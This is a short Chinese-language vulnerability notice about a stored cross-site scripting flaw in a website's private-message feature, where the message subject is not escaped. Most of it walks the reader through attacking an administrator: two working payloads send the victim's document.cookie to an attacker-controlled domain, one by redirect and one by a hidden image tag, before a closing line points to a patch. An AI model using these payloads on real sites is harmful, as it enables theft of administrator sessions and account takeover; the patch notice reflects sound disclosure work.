发送信息时,信息内容经过了转义,但是标题呢,并没有转义,问题就在这里!而且标题最大长度是255,这足以构造一些恶意的脚本,从而导致一些页面重定制,甚至窃取其它会员的cookie,也可造成通过被动式挂马漏洞。
打开发送消息界面,发送到填写管理员的username,标题比方如下:
<script>location='http://www.doamin.cn/fsda.php?k='+escape(document.cookie);</script>
其中的http://www.doamin.cn/fsda.php是你自己的域名下用来接收cookie的一个php文件。
这样一来,当对方打开收件箱时,网站将无条件跳转到你的域名,并告诉你此管理员的cookie了,既然没有做任何屏蔽,你就可以输入任何内容了!
更隐蔽一些的效果呢?不让页面重定向,并窃取cookie:
<img style="display:none" onload=this.src='http://domain.cn/k.php?k='+escape(document.cookie) />
这样将成为更隐蔽的cookie窃取方法
将压缩包中的文件解压,并覆盖之message/下即可。
中国站长站分流:短信安全漏洞补丁下载
|